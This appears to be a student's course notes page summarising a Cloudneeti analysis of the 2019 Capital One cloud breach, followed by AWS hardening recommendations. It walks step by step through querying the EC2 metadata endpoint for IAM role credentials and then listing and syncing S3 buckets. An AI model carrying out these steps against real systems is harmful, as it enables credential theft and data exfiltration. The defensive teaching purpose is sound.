-
Notifications
You must be signed in to change notification settings - Fork 0
Ops 401 Class 16
all content cited from a report dated March 2020 by cloudneeti.
The Capital One data breach from almost a year ago was one of the most devastating data breaches of all time. A trusted financial services brand, Capital One has been a leader in digital transformation within the banking industry and a sophisticated user of cloud infrastructure. This major cloud data breach serves as a valuable lesson for any organization storing confidential information in the cloud.
Soon after the breach was reported, unwarranted speculation spread on the internet, including suggestions that a single product or a set of professional services could have prevented such an attack. Taking advantage of information that has since become available, Cloudneeti has updated this research note with a technical illustration of the attack and possible ways to prevent such data breaches. On July 29, 2019, the FBI arrested Paige A. Thompson (also known by the alias “erratic”) for allegedly hacking into Capital One databases and stealing the data.
CapitalOne disclosed the estimated the data loss at approximately 1 million Social Insurance Numbers of Canadian credit card customers, about 140,000 Social Security numbers and 80,000 linked bank account numbers of the credit card customers.
AWS provided their assessment of the incident: "As Capital One outlined in their public announcement, the attack occurred due to a misconfiguration error at the application layer of a firewall installed by Capital One, exacerbated by permissions set by Capital One that were likely broader than intended. After gaining access through the misconfigured firewall and having broader permission to access resources, we believe a SSRF attack was used (which is one of several ways an attacker could have potentially gotten access to data once they got in through the misconfigured firewall."
While the indictment is not specific about the nature of the attack, the following is our best guess regarding the likely steps taken by “erratic” to compromise the data.
STEP 1: Login to the EC2 instance using SSH It’s very likely an EC2 instance was left over from a previous deployment with open SSH access. This was used to perform the SSRF attack.
STEP 2: Discover a weak IAM role Using the EC2 instance, the attacker must have been able to call the metadata service endpoint from the SSH command prompt something like this http://169.254.169.254/iam/security-credentials The endpoint must have returned a role (according to the indictment ‘*****-WAFRole’)
STEP 3: Gain temporary credentials Using the role name, the attacker then could have queried the specific endpoint to gain access to temporary credentials http://169.254.169.254/iam/security-credentials/*****-WAF-Role The above would return the full set of temporary credentials { AccessKeyId: "", SecretAccessKey: "", }
STEP 4: Gain access to S3 buckets by calling AWS S3 list and Sync CLI commands $ aws s3 ls The ls command would list all the S3 buckets accessible using the IAM role $ aws s3 sync s3://somebucket The sync command would download all resources from the ‘somebucket’ In summary, the most likely root cause of the attack was a poor security architecture design that exposed S3 buckets via AWS WAF/EC2 instance to anyone with an IAM role. While S3 buckets were not exposed to the Internet like many other breaches, an EC2 instance with an excessive IAM role might have been the culprit. The deployed architecture would have looked something like this. It was a trivial step to “compromise” the poorly configured WAF.
AWS Governance Practices The following AWS governance practices would prevent such attacks:
- Don't allow EC2 instances to have IAM roles that allow attaching or replacing role policies in any production environments.
- Clean up unused cloud resources (especially EC2 instances and S3 buckets) left over from prior development or production debugging efforts.
- Review S3 bucket permissions, policies and access via both automation and manual audits.
- AWS lists a few basics here https://aws.amazon.com/premiumsupport/knowledgecenter/secure-s3-resources/ . Cloudneeti automates 100’s of these policies and provides security and compliance views across all AWS accounts.
- Use CloudTrail, CloudWatch and/or AWS lambda services to review and automate specific actions taken on S3 resources.
- Periodically review IAM roles
Ensure each application, EC2 instance, or autoscaling group has its own IAM role. Do not share roles across unrelated applications.
Scope the permissions of each role to enable access only to the AWS resources required. The “WAF” role described above did not require access to list S3 buckets “in the normal course of business” (according to the indictment).
If possible, include a “Condition” statement within the IAM role to scope the access to known IP addresses or VPC endpoints.
If the following AWS cloud resource configurations were followed, the attack would have been prevented:
- AWS IAM: Ensure least privileged IAM instance roles are used for AWS resource access from instances.
- AWS IAM: Ensure IAM policies are attached only to groups or roles
- AWS S3: Ensure AWS S3 buckets do not allow public READ access
- AWS S3: Ensure AWS S3 buckets do not allow public READ_ACP access
- AWS S3: Ensure AWS S3 buckets do not allow public WRITE_ACP access
- AWS S3: Ensure S3 buckets do not allow FULL_CONTROL access to AWS authenticated users via S3 ACLs
- AWS S3: Ensure that Amazon S3 buckets access is limited only to specific IP addresses
- AWS S3: Ensure S3 buckets do not allow READ access to AWS authenticated users through ACLs
- AWS S3: Ensure S3 buckets do not allow FULL_CONTROL access to AWS authenticated users via S3 ACLs
- AWS S3: Ensure all S3 buckets have policy to require server-side and in transit encryption for all objects stored in bucket
- AWS Networking: Ensure no security groups allow ingress from 0.0.0.0/0 to port 22
- AWS Networking: Ensure Application Load Balancer (ALB) with administrative service: SSH (TCP:22) is not exposed to the public internet
- AWS Networking: Ensure no security groups allow ingress from 0.0.0.0/0 to port 22 (SSH)
- AWS Networking: Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389 (RDP)
- AWS - Audit and Logging: Ensure S3 bucket access logging is enabled on the CloudTrail S3 bucket
- AWS - Audit and Logging: Ensure CloudTrail is enabled in all regions
- AWS - Audit and Logging: Ensure CloudTrail trails are integrated with CloudWatch Logs
- AWS - Audit and Logging: Ensure the S3 bucket used to store CloudTrail logs is not publicly accessible
- AWS - Monitoring: Ensure a log metric filter and alarm exist for CloudTrail configuration changes.
These configurations can be part of manual deployment documentation or, ideally, be part of the Infrastructure as Code (IaC) automation within DevOps pipelines. It would prevent these misconfigurations from getting into production in the first place. A cloud security posture management solution like Cloudneeti could be used by Cloud Ops or DevOps team to continuously validate their security posture in preproduction and production environments.
The industry was understandably shocked by the sheer scale of the attack against one of the most trusted brands operating on one of the most secure infrastructures. There are several lessons to be learned.
Misconfiguration can cause catastrophic losses and the Capital One experience is only one of many known cases. We anticipate seeing more breaches at companies who have not kept up with the pace of change in their cloud environments and have not implemented adequate cloud security and compliance assurance.
This content is relevant to our coursework because it touches on a significant data breach in recent history and introduces key takeaways that should be kept in mind by security professionals to ensure that the organizations they are working for are not subject to the same misconfigurations and oversight, which could result in similar consequences.